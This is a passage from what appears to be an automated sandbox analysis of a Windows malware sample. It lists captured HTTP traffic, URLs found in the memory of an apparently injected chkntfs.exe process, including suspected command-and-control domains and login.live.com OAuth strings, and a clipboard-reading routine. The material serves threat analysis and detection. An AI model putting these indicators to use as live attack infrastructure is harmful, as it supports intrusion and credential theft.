cfL4;desc="?proto=TCP&rtt=1433&min_rtt=1433&rtt_var=716&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1809&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:36:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdjmh9Mh8xzsQjUIEsH53RNr4aDLOsqBF%2BZ4Esstoz5GPkA2JlAtvNo%2BbdwariWa8UHITWiBuM03tjddz62ymvkTOGMj0rshp1svyMvFA%2BpkmKLyTA2WpdUWQO%2BXy18JXDwE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140eb64e7d1899-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=515&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 
72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendl
                Source: OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000002DA8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://einpisalpace.shop/
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.68markavenue.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.69meinvzhibo.com/binding
                Source: OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.agrobazar.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aguardiente.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aicaozhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.allprinting.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.americanstar.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.anmozhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.astellia.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.athousandwords.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                Source: OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/broadcast.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.tangyizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theflowerpot.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.urbanscout.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.uwrf.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.welovebeauty.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wujizhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wunvzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaodouzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaomiaozhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiapizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingmengzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingyuanzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xunaizhibo.com/binding
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyangzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yaomeizhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yemizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yeyanzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinxiuzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.younazhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourreality.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuehaizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueliangzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueyanzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zhonglangzhibo.net
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000002C16000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: chkntfs.exe, 00000008.00000003.2809308609.000000000782D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EAEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EAEAFF
